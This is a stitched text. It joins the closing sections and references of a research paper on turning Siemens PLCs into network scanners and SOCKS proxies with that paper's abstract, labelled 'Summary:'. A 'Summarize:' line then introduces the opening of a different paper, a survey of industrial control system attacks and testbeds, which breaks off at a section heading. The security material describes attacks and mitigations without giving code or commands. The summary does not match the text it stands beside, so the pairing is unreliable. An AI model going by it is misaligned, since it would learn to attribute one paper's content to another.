reset - In this state we close all connections with TDISCON and reset all persisted flags to their initial values.

V. EVALUATION

We analyzed the differences in the execution cycle times of the following scenarios: (a) a simple control program as a baseline, (b) its malicious version with the prepended SOCKS proxy in idle mode, and (c) under load. Idle mode means that the proxy has been added to the control code but no proxy connection has been established. The baseline program copies the input memory bytewise to the output memory 20 times, which results in 81920 copy instructions. For the measurement, we added small code snippets which store the last cycle time in a data block. Siemens PLCs store the time of the last execution cycle in a local variable of OB1 called OB1_PREV_CYCLE. We measured 2046 cycles in each scenario. None of the three scenarios exhibits a normal distribution. We used the Kruskal-Wallis test and Dunn's Multiple Comparison Test for statistical significance analysis. The results are shown in Figure 14. Execution time differed significantly in all three scenarios. Table II shows the mean
Figure 14: Data distribution of the measured scan cycles for the three scenarios. Data are represented as box plots with mean and were analyzed using the Kruskal-Wallis test and Dunn's Multiple Comparison Test. Significant differences are shown in the graph (p < 0.0001 = ***). All data were statistically analyzed with Prism software, version 5.0 (GraphPad Inc.).

Table II: Statistical analysis of the three scenarios

                        Mean   Std. Deviation  Std. Error
Baseline (ms)           85.32  0.4927          0.01089
Proxy idle (ms)         85.40  0.5003          0.01106
Proxy under load (ms)   86.67  0.5239          0.01158

difference of the baseline and the proxy-under-load program, which is only 1.35 ms. The maximum transfer rate of the SOCKS proxy prepended to the baseline program was about 40 KB/s. If the SOCKS proxy runs alone on the PLC, it is able to transfer up to 730 KB/s. All network measurements used a direct 100 Mbit/s Ethernet connection to the PLC. Finally, we tested the described attack cycle in our laboratory. In addition to regular traffic, we verified that we were able to tunnel an exploit for the DoS vulnerability CVE-2015-2177 via the SOCKS tunnel using the tsocks library. The exploit worked as expected via the SOCKS tunnel.

VI. DISCUSSION

Our attacks have limitations. In order to ensure that the PLC is always responsive, the execution time of the main program is monitored by a watchdog which kills the main program if the execution time becomes too long. The additional SNMP scanner or proxy code that we upload, together with the original program, should not exceed the overall maximum execution time of 150 ms. An injection of the scanner or proxy is unlikely to trigger this timeout because the mean additional execution time of the proxy under load is 1.35 ms, which is small compared to 150 ms. Furthermore, timeouts can be avoided by resetting the time counter after the execution of the
injected program with the system function RE_TRIGR [21]. The easiest way to mitigate the described attack is to keep the PLC offline or to use a virtual private network instead. If this is not possible, protection level 3 should be activated on the Siemens PLC. This enables a password-based read and write protection for the PLC. Without the right password the attacker cannot modify the PLC's program. Based on our experience, this feature is rarely used in practice. Another applicable protection mechanism would be a firewall with deep packet inspection which is aware of industrial control protocols and can thus block potentially malicious accesses such as attempts to reprogram the PLC.

VII. CONCLUSION

We have shown a new threat vector that enables an external attacker to leverage a PLC as an SNMP scanner and network gateway into the internal production network. This makes it possible to access control systems behind an Internet-facing PLC. Our measurements indicate that the attack code, which runs de facto in parallel with the original control program, causes a statistically significant but negligible increase of the execution cycle time. This makes a service disruption of the PLC unlikely and increases the chances that an attack remains undetected. Prior work on scanning the Internet for ICS only addressed risks due to control systems that are connected to the Internet directly. Our investigation shows that risk assessments must take into account PLCs that are connected only indirectly to the Internet. As a consequence, the target set of Internet-reachable industrial control systems is probably larger than expected and includes the "deep" industrial control network.

REFERENCES

[1] S. Heng, "Industry 4.0: Upgrading of Germany's industrial capabilities on the horizon," Deutsche Bank Research, 2014.
[2] NIST, "CVE-2014-2908," Apr.
2014. [Online]. Available: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2908
[3] --, "CVE-2014-2246," Mar. 2014. [Online]. Available: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2246
[4] --, "CVE-2012-3037," May 2012. [Online]. Available: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3037
[5] D. Beresford, "Exploiting Siemens Simatic S7 PLCs," Black Hat USA, 2011.
[6] National Cybersecurity and Communications Integration Center (NCCIC), "ICS-CERT Monitor," Sep. 2014.
[7] Bundesamt für Sicherheit in der Informationstechnik, "Die Lage der IT-Sicherheit in Deutschland 2014," 2015.
[8] Industrial Control Systems Cyber Emergency Response Team, "Alert (ICS-ALERT-12-046-01A): Increasing Threat to Industrial Control Systems (Update A)," ICS-CERT, Oct. 2012. [Online]. Available: https://ics-cert.us-cert.gov/alerts/ICS-ALERT-12-046-01A
[9] J.-O. Malchow and J. Klick, "Erreichbarkeit von digitalen Steuergeräten - ein Lagebild," in Sicherheit in vernetzten Systemen: 21. DFN-Workshop, C. Paulsen, Ed., 2014, pp. C2-C19.
[10] B. Radvanovsky, "Project SHINE: 1,000,000 Internet-connected SCADA and ICS systems and counting," Tofino Security, 2013.
[11] R. Langner, "A time bomb with fourteen bytes," 2011. [Online]. Available: http://www.langner.com/en/2011/07/21/a-time-bomb-with-fourteen-bytes/
[12] B. Meixell and E. Forner, "Out of Control: Demonstrating SCADA Exploitation," Black Hat USA, 2013.
[13] S. E. McLaughlin, "On dynamic malware payloads aimed at programmable logic controllers," in HotSec, 2011.
[14] S. McLaughlin and P. McDaniel, "SABOT: Specification-based payload generation for programmable logic controllers," in Proceedings of the 2012 ACM Conference on Computer and Communications Security. ACM, 2012, pp. 439-449.
[15] Wikipedia, "Automation Pyramid (content taken)." [Online]. Available: https://de.wikipedia.org/wiki/Automatisierungspyramide
[16] Siemens, "S7 314C-2PN/DP Technical Details." [Online].
Available: https://support.industry.siemens.com/cs/pd/495261?pdti=td&pnid=13754&lc=de-WW
[17] --, "S7-300 CPU 31xC and CPU 31x: Technical specifications." [Online]. Available: https://cache.industry.siemens.com/dl/files/906/12996906/att_70325/v1/s7300_cpu_31xc_and_cpu_31x_manual_en-US_en-US.pdf
[18] --, "S7-300 Instruction List: S7-300 CPUs and ET 200 CPUs," 2011. [Online]. Available: https://cache.industry.siemens.com/dl/files/679/31977679/att_81622/v1/s7300_parameter_manual_en-US_en-US.pdf
[19] Snap7, "S7 Protocol." [Online]. Available: http://snap7.sourceforge.net/siemens_comm.html#s7_protocol
[20] J. Kühner, "DotNetSiemensPLCToolBoxLibrary." [Online]. Available: https://github.com/jogibear9988/DotNetSiemensPLCToolBoxLibrary
[21] Siemens, "System Software for S7-300/400: System and Standard Functions, Volume 1/2," 2006. [Online]. Available: https://cache.industry.siemens.com/dl/files/574/1214574/att_44504/v1/SFC_e.pdf
[22] D. Marzin, S. Lau, and J. Klick, "PLCinject Tool." [Online]. Available: https://github.com/SCADACS/PLCinject
[23] J. Case, M. Fedor, M. Schoffstall, and J. Davin, "Simple Network Management Protocol (SNMP)," RFC 1157 (Historic), Internet Engineering Task Force, May 1990. [Online]. Available: http://www.ietf.org/rfc/rfc1157.txt
[24] M. Leech, M. Ganis, Y. Lee, R. Kuris, D. Koblas, and L. Jones, "SOCKS Protocol Version 5," RFC 1928 (Proposed Standard), Internet Engineering Task Force, Mar. 1996. [Online]. Available: http://www.ietf.org/rfc/rfc1928.txt
Summary:
Industrial control systems (ICS) are integral components of production and control processes. Our modern infrastructure heavily relies on them. Unfortunately, from a security perspective, thousands of PLCs are deployed in an Internet-facing fashion. Security features are largely absent in PLCs. If they are present, then they are often ignored or disabled because security is often at odds with operations. As a consequence, it is often possible to load arbitrary code onto an Internet-facing PLC. Besides being a grave problem in its own right, it is possible to leverage PLCs as network gateways into production networks and perhaps even the corporate IT network. In this paper, we analyze and discuss this threat vector and we demonstrate that exploiting it is feasible. For demonstration purposes, we developed a prototypical port scanner and a SOCKS proxy that run in a PLC. The scanner and proxy are written in the PLC's native programming language, the Statement List (STL). Our implementation yields insights into what kinds of actions adversaries can perform easily and which actions are not easily implemented on a PLC.
Summarize:
KEYWORDS | Computer security; industrial control; networked control systems; power system security; SCADA systems; security

I. INTRODUCTION

Modern industrial control systems (ICSs) use information and communication technologies (ICTs) to control and automate stable operation of industrial processes [1], [2]. ICSs interconnect, monitor, and control processes in a variety of industries such as electric power generation, transmission and distribution, chemical production, oil and gas, refining and water desalination. The security of ICSs is receiving attention due to their increasing connections to the Internet [3]. ICS security vulnerabilities can be attributed to several factors: use of microprocessor-based controllers, adoption of communication standards and protocols, and the complex distributed network architectures. The security of ICSs has come under particular scrutiny owing to attacks on critical infrastructures [4], [5]. Traditional IT security solutions fail to address the coupling between the cyber and physical components of an ICS [6]. According to NIST [1], ICSs differ from traditional IT systems in the following ways. 1) The primary goal of ICSs is to maintain the integrity of the industrial process. 2) ICS processes are continuous and hence need to be highly available; unexpected outages for repair must be planned and scheduled. 3) In an ICS, interactions with physical processes are central and oftentimes complex. 4) ICSs target specific industrial processes and may not have resources for additional capabilities such as security. 5) In ICSs, timely response to human reaction and physical sensors is critical. 6) ICSs use proprietary communication protocols to control field devices. 7) ICS components are replaced infrequently (15-20 years or longer). 8) ICS components are distributed and isolated and hence difficult to physically access to repair and upgrade.
Attacks on ICSs are happening at an alarming pace, and the cost of these attacks is substantial for both governments and industries [7]. Cyberattacks against oil and gas infrastructure are estimated to cost the companies $1.87 billion by 2018 [8]. Until 2001, most attacks originated internal to a company. Recently, attacks

Manuscript received August 31, 2015; revised November 19, 2015; accepted December 19, 2015. Date of publication March 16, 2016; date of current version April 19, 2016. This work was supported in part by the German Science Foundation as part of Project S2 within the CRC 1119 CROSSING; by the European Union's Seventh Framework Programme under Grant 609611, PRACTICE project; and by the Intel Collaborative Research Institute for Secure Computing (ICRI-SC). The NYU researchers were also supported in part by Consolidated Edison, Inc., under Award 4265141; by the U.S. Office of Naval Research under Award N00014-15-1-2182; and by the NYU Center for Cyber Security (New York and Abu Dhabi).
S. McLaughlin is with KNOX Security, Samsung Research America, Mountain View, CA 94043 USA (e-mail: s.mclaughlin@samsung.com).
C. Konstantinou, X. Wang, and R. Karri are with the Polytechnic School of Engineering, New York University, Brooklyn, NY 11201 USA (e-mail: ckonstantinou@nyu.edu; rkarri@nyu.edu).
L. Davi and A.-R. Sadeghi are with Technische Universität Darmstadt, Darmstadt 64289, Germany (e-mail: lucas.davi@trust.cased.de; ahmad.sadeghi@trust.cased.de).
M. Maniatakos is with the Electrical and Computer Engineering Department, New York University Abu Dhabi, Abu Dhabi, UAE (e-mail: michail.maniatakos@nyu.edu).
Digital Object Identifier: 10.1109/JPROC.2015.2512235
0018-9219 © 2016 IEEE. Personal use is permitted, but republication/redistribution requires IEEE permission. See http://www.ieee.org/publications_standards/publications/rights/index.html for more information.
Vol. 104, No. 5, May 2016 | Proceedings of the IEEE 1039
Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11, 2025 at 16:34:42 UTC from IEEE Xplore. Restrictions apply.

external to a company are becoming frequent. This is due to the use of commercial off-the-shelf (COTS) devices, open applications and operating systems, and the increasing connection of the ICS to the Internet. In an effort to keep up with the cyberattacks, cybersecurity researchers are investigating the attack surface and defenses for critical infrastructure domains such as the smart grid [9], oil and gas [10], and water SCADA [11]. This survey will focus on the general ICS cybersecurity landscape by discussing attacks and defenses at various levels of abstraction in an ICS, from the hardware to the process.

A. Industrial Control Systems

The general architecture of an ICS is shown in Fig. 1. The main components of an ICS include the following.

Programmable logic controller (PLC): A PLC is a digital computer used to automate industrial electromechanical processes. PLCs control the state of output devices based on the signals received from the sensors and the stored programs. PLCs operate in harsh environmental conditions, such as excessive vibration and high noise [12]. PLCs control standalone equipment and discrete manufacturing processes.

Distributed control system (DCS): A DCS is an automated control system in which the control elements are distributed throughout the system [13]. The distributed controllers are networked to remotely monitor processes. The DCS can remain operational even if a part of the control system fails. DCSs are often found in continuous and batch production processes which require advanced control and communication with intelligent field devices.

Supervisory control and data acquisition (SCADA): SCADA is a computer system used to monitor and control industrial processes.
SCADA monitors and controls field sites spread out over a geographically large area. SCADA systems gather data in real time from remote locations. Supervisory decisions are then made to adjust controls.

B. History of ICS Attacks

In an ICS, stable operation can be disrupted not only by an operator error or a failure at a production unit, but also by a software error/bug, malware, or an intentional cyber criminal attack [14]. Just in 2014, the ICS Cyber Emergency Response Team (ICS-CERT) responded to 245 incidents. Numerous cyberattacks on ICS are summarized in Fig. 2. We elaborate on four ICS attacks that caused physical damage.

In 2007, Idaho National Laboratory staged the Aurora attack in order to demonstrate how a cyberattack could destroy physical components of the electric grid [15]. The attacker gained access to the control network of a diesel generator. Then a malicious computer program was run to rapidly open and close the circuit breakers of the generator, out of phase from the rest of the grid, resulting in an explosion of the diesel generator. Since most of the grid equipment uses legacy communications protocols that did not consider security, this vulnerability is especially a concern [16].

In 2008, a pipeline in Turkey was hit by a powerful explosion spilling over 30000 barrels of oil in an area above a water aquifer. Further, it cost British Petroleum $5 million a day in transit tariffs. The attackers entered the system by exploiting the vulnerabilities of the wireless camera communication software, and then moved deep into the internal network. The attackers tampered with the units used to alert the control room about malfunctions and leaks, and compromised PLCs at valve stations to increase pressure in the pipeline, causing the explosion.

In 2010, the Stuxnet computer worm infected PLCs in 14 industrial sites in Iran, including a uranium enrichment plant [4], [17]. It was introduced to the target system via an infected USB flash drive.
Stuxnet then stealthily propagated through the network by infecting removable drives, copying itself to network shared resources, and exploiting unpatched vulnerabilities.

Fig. 1. General structure of an ICS. The industrial process data collected at remote sites are sent by field devices such as remote terminal units (RTUs), intelligent electronic devices (IEDs), and programmable logic controllers (PLCs) to the control center through wired and wireless links. The control server allows clients to access data using standard protocols. The human machine interface (HMI) presents processed data to a human operator by querying the time-stamped data accumulated in the data historian. The gathered data are analyzed, and control commands are sent to remote controllers.

The infected computers were instructed to connect to an external command and control server. The central server then reprogrammed the PLCs to modify the operation of the centrifuges so that the compromised PLCs made them tear themselves apart [18]. In 2015, two hackers demonstrated remote control of a vehicle [19]. The zero-day exploit gave the hackers wireless control of the vehicle. The software vulnerabilities in the vehicle entertainment system allowed the hackers to remotely control it, including dashboard functions, steering, brakes, and transmission, enabling malicious actions such as controlling the air conditioner and audio, disabling the engine and the brakes, and commandeering the wheel [20]. This is a harbinger of attacks in an automated manufacturing environment where intelligent robots cohabitate and coordinate with humans.

C.
Roadmap of This Paper

Cybersecurity assessment can reveal the obvious and nonobvious physical implications of ICS vulnerabilities on the target industrial processes. Cybersecurity assessment of ICSs for physical processes requires capturing the different layers of an ICS architecture. The challenges of creating a vulnerability assessment methodology are discussed in Section II. Cybersecurity assessment of an ICS requires the use of a testbed. The ICS testbed should help identify cybersecurity vulnerabilities as well as the ability of the ICS to withstand various types of attacks that exploit these vulnerabilities. In addition, the testbed should ensure that critical areas of the ICS are given adequate attention. This way one can lessen the costs of fixing cybersecurity vulnerabilities emerging from flaws in the design of ICS components and the ICS network. ICS testbeds are discussed in Section II. Discussion on how one can construct attack vectors appears in Section III. Attacks on ICSs can have devastating physical consequences. Therefore, ICSs need to be designed for security robustness and tested prior to deployment. Control protocols should be fitted with security features and policies. ICSs should be reinforced by isolating critical operations and by removing unnecessary services and applications from ICS components. Extensive discussion on vulnerability mitigation appears in Section IV, followed by final remarks in Section V.

II. ICS VULNERABILITY ASSESSMENT

In this section, we review the different layers in an ICS and the vulnerability assessment process outlining the cybersecurity assessment strategy, and discuss ICS testbeds for accurate vulnerability analyses in a lab environment.

A. The ICS Architecture and Vulnerabilities

The different layers of the ICS architecture are shown in Fig. 3.
1) Hardware Layer: Embedded components such as PLCs and RTUs are hardware modules executing software. Hardware attacks such as fault injection and backdoors can be introduced into these modules. These vulnerabilities in the hardware can be exploited by adversaries to gain access to stored information or to deny services.

The hardware-level vulnerabilities concern the entire life cycle of an ICS, from design to disposal. Security in the processor supply chain is a major issue, since hardware trojans can be injected at any stage of the supply chain, introducing potential risks such as loss of reliability and security [21], [22]. Unauthorized users can use JTAG ports intended for in-circuit test to steal intellectual property, modify firmware, and reverse engineer logic [23]–[25]. Peripherals introduce vulnerabilities. For example, malicious USB drives can redirect communications by changing DNS settings or destroy the circuit board [26], [27]. Expansion cards, memory units, and communication ports pose a security threat as well [28]–[30].

Fig. 2. Timeline of cyberattacks on ICS and their physical impacts.

2) Firmware Layer: The firmware resides between the hardware and software. It includes data and instructions able to control the hardware. The functionality of firmware ranges from booting the hardware and providing runtime services to loading an operating system (OS). Due to the real-time constraints related to the operation of ICSs, firmware-driven systems typically adopt a real-time operating system (RTOS) such as VxWorks. In any case, vulnerabilities within the firmware could be exploited by adversaries to abnormally affect the ICS process.
A recent study exploited vulnerabilities in a wireless access point and a recloser controller firmware [31]. Malicious firmware can be distributed from a central system in an advanced metering infrastructure (AMI) to smart meters [32]. Clearly, vulnerabilities in firmware can be used to launch DoS attacks to disrupt the ICS operation.

Fig. 3. Layered ICS architecture and the vulnerable components in the ICS stack.

3) Software Layer: ICSs employ a variety of software platforms and applications, and vulnerabilities in the software base may range from simple coding errors to poor implementation of access control mechanisms. According to ICS-CERT, the highest percentage of vulnerabilities in ICS products is improper input validation by ICS software, also known as the buffer overflow vulnerability [33]. Poor management of credentials and authentication weaknesses are second and third, respectively. These vulnerabilities in the implementation of software interfaces (e.g., HMI) and server configurations may have fatal consequences for the control functionality of an ICS. For instance, a proprietary industrial automation software for historian servers had a heap buffer overflow vulnerability that could potentially lead to a Stuxnet-type attack [34].

Sophisticated malware often incorporates both hardware and software. WebGL vulnerabilities are an example of hardware-enabled software attacks: access to GPU graphics hardware by a least-privileged remote party results in the exposure of GPU memory contents from previous workloads [35].
The implementation of the software layer in a HIL testbed should reflect how each component added to the ICS increases the attack surface.

4) Network Layer: Vulnerabilities can be introduced into the ICS network in different ways [1]: a) firewalls (that protect devices on a network by monitoring and controlling communication packets using filtering policies); b) modems (that convert between serial digital data and a signal suitable for transmission over a telephone line to allow devices to communicate); c) the fieldbus network (that links sensors and other devices to a PLC or other controller); d) communication systems and routers (that transfer messages between two networks); e) remote access points (that remotely configure ICS and access process data); and f) protocols and the control network (that connect the supervisory control level to lower level control modules). DCS and SCADA servers, communicating with lower level control devices, often are not configured properly and not patched systematically, and hence are vulnerable to emerging threats [36].

When designing a network architecture for an ICS, one should separate the ICS network from the corporate network. In case the networks must be connected, only minimal connections should be allowed, and the connection must be through a firewall and a DMZ.

5) Process Layer: All the aforementioned ICS layers interact to implement the target ICS processes. The observed dynamic behavior of the ICS processes must follow the dynamic process characteristics based on the designed ICS model [37]. ICS process-centric attacks may inject spurious/incorrect information (through specially crafted messages) to degrade performance or to hamper the efficiency of the controlled process [33]. Process-centric attacks may also disturb the process state (e.g., crash or halt) by modifying runtime process variables or the control logic. These attacks can deny service or change the industrial process without operator knowledge.
Therefore, it is imperative to determine whether variations in the system process are nominal consequences of an expected operation or signal an anomaly/attack. Process-centric/process-aware vulnerability analysis can contribute to practices that enable ICS processes to function in a secure manner. The vulnerabilities related to the information flow (e.g., dependencies on hardware/software/network equipment with a single point of failure) must be determined. The HIL testbed should properly emulate the target process in order to effectively assess and mitigate process-centric attacks [38].

B. ICS Vulnerability Assessment

Fig. 4 presents the steps in the security assessment process, whose aim is to identify security weaknesses and potential risks in ICSs. Due to the real-world consequences of ICS, security assessment of ICSs must account for all possible operating conditions of each ICS component. Additionally, since ICS equipment can be more fragile than standard IT systems, the security assessment should take into consideration the sensitive ICS dependencies and connectivity [39].

1) Document Analysis: The first step in assessing any ICS is to characterize the different parts of its architecture. This includes gathering and analyzing information in order to understand the behavior of each ICS component. For example, analyzing the features of IEDs used in power systems, such as a relay controller, entails collecting information about its communication, functionality, default configuration passwords, and supported protocols [40].

Fig. 4. Security assessment of ICS.
2) Mission and Asset Prioritization: Prioritizing the missions and assets of the ICS is the next step in security assessment. Resources must be allocated based on the purpose and sensitivity of each function. Demilitarized zones (DMZs), for instance, can be used to add a layer of security to the ICS network by isolating the ICS and corporate networks [41]. Selecting DMZs is an important task in this phase.

3) Vulnerability Extrapolation: Next, the ICS should be examined for security vulnerabilities, to identify sources of vulnerability and to establish attack vectors [42]. Design weaknesses and security vulnerabilities in critical authentication, application, and communication security components should be investigated. The attack vectors should comprehensively explain the targeted components and the attack technique.

4) Assessment Environment: Depending on the type of industry and the level of abstraction, assessment actions must be defined [37]. For example, when only software is used, the test vectors should address as many physical and cyber characteristics of the ICS as possible. By modeling and simulating individual ICS modules, the behavior of the system is emulated with regard to how the ICS and its internal functions react.

Due to the complexity and real-time requirements of ICSs, hardware-in-the-loop (HIL) simulation is more efficient for testing system resiliency against the developed attack vectors [43]. HIL simulation adds the ICS complexity to the assessment platform by adding the control system in a loop, as shown in Fig. 5(b). To capture the system dynamics, the physical process is replaced with a simulated plant, including sensors, actuators, and machinery. A well-designed HIL simulator will mimic the actual process behavior as closely as possible. A detailed discussion of developing an assessment environment appears in Section II-C.
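The loop structure of such an assessment environment can be sketched in a few lines. The following is a minimal, purely illustrative sketch (all names are hypothetical, not from any cited testbed): a first-order thermal model stands in for the simulated plant, and `controller` stands in for the device under test, which in a real HIL testbed would be an actual PLC reached over an industrial protocol.

```python
def plant_step(temp, heater_on, dt=1.0, ambient=20.0):
    """First-order thermal model: heating drives the temperature up,
    losses pull it toward ambient. A stand-in for the simulated plant."""
    heat_in = 5.0 if heater_on else 0.0
    return temp + dt * (heat_in - 0.1 * (temp - ambient))

def controller(temp, setpoint=50.0, band=1.0):
    """On/off (bang-bang) control law; stand-in for the device under test."""
    return temp < setpoint - band

temp = 20.0
trace = []
for _ in range(200):                    # closed loop: plant -> controller -> plant
    heater_on = controller(temp)        # controller reads the simulated sensor
    temp = plant_step(temp, heater_on)  # actuator command drives the plant model
    trace.append(temp)

# The loop settles near the setpoint; attack vectors (e.g., spoofed sensor
# values fed to the controller) can then be injected and their physical
# effect on `trace` observed without touching a live process.
```

The design point is that the plant model is replaceable: swapping `plant_step` for a higher-fidelity simulator changes nothing on the controller side of the loop.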
5) Testing and Impact: The ICS is tested on the testbed to demonstrate the outcomes of the attacks, including the potential effect on the physical components of the ICS [44]. In addition, the system-level response and the consequences to the overall network can be observed. The results can be used to assess the impact of a cyberattack on the ICS.

6) Vulnerability Remediation: Any weaknesses discovered in the previous steps should be carefully mitigated. This may involve working with vendors [45] and updating network policies [46]. If there is no practical mitigation strategy to address a vulnerability, guidelines should be developed to allow sufficient time to effectively resolve the issue.

7) Validation Testing: The mitigation actions designed to resolve security issues must then be tested. A critical part of this step is to reexamine the ICS and identify weaknesses.

8) Monitoring: Implementing all the previous steps is half the battle. Continuous monitoring and reassessment of the ICS to maintain security is important [47]. Intrusion detection systems (IDSs) can assist in continuously monitoring network traffic and discovering potential threats and vulnerabilities.

C. ICS Testbeds

The assessment environment, i.e., the testbed, affects all the stages of the assessment methodology. Assessment methodologies that include the production environment or that test individual components of the ICS are not relevant. Although these methodologies are effective for IT systems, the uniquely-ICS nature of using data to manipulate physics makes these approaches inherently hazardous. Therefore, we focus on lab-based ICS testbeds. A HIL testbed offers numerous benefits by balancing accuracy and feasibility. In addition, HIL testbeds can be used to train employees and to ensure interoperability of the diverse components used in the ICS.
The cyber physical nature of ICSs presents several challenges in the design and operation of an ICS testbed. The testbed must be able to model the complex behavior of the ICS for both operating and nonoperating conditions. It should address scaling, since the testbed is a scaled-down model of the actual physical ICS. Furthermore, the testbed must accurately represent the ICS in order to support the protocols and standards as well as to generate accurate data. It is also important for the testbed to capture the interaction between legacy and modern ICS. This interaction is important for both security assessment and compatibility testing of the ICS. Numerous other factors should be considered when designing an ICS testbed, including flexibility, the interface with IT systems, configuration settings, and testing for extreme conditions.

Fig. 5. (a) Real ICS environment versus (b) HIL simulation of ICSs.

Assessment of ICS using software-only testbeds and techniques is not frequently adopted. Software models and simulations cannot recreate real-world conditions, since they include only one layer of the complex ICS architecture. Furthermore, the software models cannot include every possible cyber physical system state of the ICS [48]. Software-only testbeds are also limited by the supported hardware. Moreover, the limitations of the computational features supported by the software simulator might introduce delays, simplifying assumptions, and simple heuristics in the simulator engine (e.g., theoretical implementation of network protocols). Finally, in most cases, a software-only testbed gives the users a false sense of security regarding the accuracy of the simulation results.
On the other hand, software-only assessment is advantageous in that one can study the behavior of a system without building it. Scilab and Scicos are two open-source software platforms for the design, simulation, and realization of ICSs [49], [50].

It is clear that an ICS testbed requires real hardware in the simulation loop. Such HIL simulation symbiotically relates cyber and physical components [51]. A HIL testbed can simulate real-world interfaces, including interoperable simulations of control infrastructures, distributed computing applications, and communication network protocols.

1) Security Objectives of HIL Testbeds: The primary objective of HIL testbeds is to guide the implementation of cybersecurity within ICSs. In addition, HIL testbeds are essential for determining and resolving security vulnerabilities. The individual components of an appropriate testbed should capture all the ICS layers and their interactions, as shown in Fig. 3.

Equipment and network vulnerabilities can be tested in a protected environment that can facilitate multiple types of ICS scenarios highlighting the several layers of the ICS architecture. For instance, the cybersecurity testbed developed by NIST covers several ICS application scenarios [52]. The Tennessee Eastman scenario covers continuous process control in a chemical plant. The robotic assembly scenario covers discrete dynamic processes with embedded control. The enclave scenario covers wide-area industrial networks in an ICS such as SCADA.
2) Benefits of a HIL Assessment Methodology: The HIL assessment methodology has the following advantages:

- Flexibility: HIL systems provide reconfigurable architectures for testing several ICS application scenarios (incorporating legacy and modern equipment).
- Simulation: ICS phenomena are simulated faster than complex physical ICS events.
- Accuracy: HIL simulators provide results comparable in accuracy with the live ICS environment.
- Repeatability: the controlled settings in the testbed increase repeatability.
- Cost effectiveness: the combination of hardware and HIL software reduces the implementation costs of the testbed.
- Safety: HIL simulation avoids the hazards present when testing in a live ICS setting.
- Comprehensiveness: it is often possible to assess ICS scenarios over a wider range of operating conditions.
- Modularity: HIL testbeds facilitate linkages with other interfaces and testbeds, integrating multiple types of control components.
- Network integration: protocols and standards can be evaluated, creating an accurate map of networked units and their communication links.
- Nondestructive testing: destructive events can be evaluated (e.g., the Aurora generator test [53]) without causing damage to the real system.
- Hardware security: a HIL testbed allows one to study the hardware security of an ICS, which has become a major concern over the past decade (e.g., side-channel and firmware attacks [44]).

3) Example ICS Testbeds: Over 35 smart grid testbeds have been developed in the United States [54]. The ENEL SPA testbed analyzes attack scenarios and their impact on power plants [55]. It includes a scaled-down physical process, corporate and control networks, DMZs, PLCs, industry-standard software, etc. The Idaho National Laboratories (INL) SCADA Testbed is a large-scale testbed dedicated to ICS cybersecurity assessment, standards improvements, and training [56].
The PowerCyber testbed integrates communication protocols, industry control software, and field devices combined with virtualization platforms, real-time digital simulators (RTDSs), and ISEAGE WAN emulation in order to provide an accurate representation of cyber physical grid interdependencies [57]. Digital Bond's Project Basecamp demonstrates the fragility and insecurity of SCADA and DCS field devices, such as PLCs and RTUs [58]. New York University (NYU) has developed a smart grid testbed to model the operation of circuit breakers and demonstrate firmware modification attacks on relay controllers [44]. Many hybrid laboratory-scale ICS testbeds exist in research centers and universities [54]. Besides laboratory-scale ICS testbeds with real equipment, many virtual testbeds are also being developed, able to create ICS components including virtual devices and process simulators [59].

Summarizing, given that many ICS attacks exploit vulnerabilities in one or more layers of an ICS, HIL ICS testbeds are becoming standard for security assessment, allowing development and testing of advanced security methods. Additionally, HIL ICS testbeds have been quantitatively shown to produce results close to real-world systems.

III. ATTACKS ON ICSs

An important part of the assessment process is the identification of vulnerabilities in the ICS under test. In this section, we present the current and emerging threat landscapes for ICSs.

A. Current ICS Threat Landscape

ICSs are vulnerable to traditional computer viruses [60]–[62], remote break-ins [63], insider attacks [64], and targeted attacks [65].
Industries affected by ICS attacks include nuclear power and refinement of fissile material [62], [65], transportation [63], [66], electric power delivery [67], manufacturing [60], building automation [64], and space exploration [61].

One class of attacks against ICS involves compromising one or more of its components using traditional attacks, e.g., memory exploits, to gain control of the system's behavior or to access sensitive data related to the process. We consider three classes of studies on ICS vulnerabilities. The first considers studies of the security and security readiness of ICS systems and their operators. The second class considers security vulnerabilities in PLCs. The third class considers vulnerabilities in sensors, in this case focusing on smart electric meters, an important component of the smart grid infrastructure.

1) ICS Security Posture: There have been studies of the ICS security posture [68], and the conclusion is that there is substantial room for improvement. First, it was found that ICSs frequently rely on security through obscurity, due to their history of being proprietary systems isolated from the Internet. However, the use of commodity OSs (e.g., Microsoft Windows) and open, standard network protocols has left ICSs open not only to malicious attacks, but also to coincidental infiltration by Internet malware. For example, the Slammer worm infected machines belonging to an Ohio nuclear power generation facility. These studies also showed a significant rise in ICS cybersecurity incidents; while only one incident was reported in 2000, ten incidents were reported in 2003. Penetration tests of over 100 real-world ICSs over the course of ten years, with emphasis on power control systems, corroborate these findings [69]. Besides identifying vulnerabilities throughout the ICS, the study shows that in most cases these ICSs are at least a year behind the standard patch cycle.
In some cases, the DMZ separating the ICS from the corporate network had not been updated in years, leaving DoS attacks trivial. For example, in their evaluation of a network-connected PLC, it was found that ping flooding with 6-kB packets was sufficient to render the PLC inoperable, causing all state to be lost and forcing it to be power cycled.

Another hurdle in improving ICS security is a set of three commonly held myths [70]: 1) security can be achieved through obscurity; 2) blindly deploying security technologies improves security (the naive application of firewalls, cryptography, and antivirus software often leaves system operators with a false sense of security); and 3) standards compliance yields a secure system (the North American Electric Reliability Corporation's Critical Infrastructure Protection standards [71] have been criticized for giving a false sense of security [72]).

2) Attacks on PLCs: PLCs monitor and manipulate the state of a physical system. A popular Siemens PLC was shown to have vulnerabilities. The ISO-TSAP protocol used by these PLCs permits a replay attack due to the lack of proper session freshness [73]. It was also possible to bypass the PLC authentication, which is sufficient to upload payloads as described in Section III-B, and to execute arbitrary commands on the PLC. The Siemens PLCs used in correctional facilities have vulnerabilities allowing manipulation of cell doors [74].

3) Attacks on Sensors: Another critical element in an ICS is the set of sensors that gather data and relay them back to the control units. Consider smart meters, a widely deployed element of the evolving smart electric grid [75]. A smart meter has the same form factor as a traditional analog electric meter, with a number of enhanced features: time-of-use pricing [76], automated meter reading, power quality monitoring, and remote power disconnect. A security assessment of a real-world smart metering system considered energy theft by tampered measurement values [77].
The system under test allowed undetectable tampering of measurement values both in the meter's persistent storage and in flight, due to a replay attack against the meter-to-utility authentication scheme. A follow-up study examined meters from multiple vendors and found vulnerabilities allowing a single-packet denial-of-service attack against an arbitrary meter, and full control of the remote disconnect switch, enabling a targeted disconnect of the service to a customer [78].

B. Emerging Threats

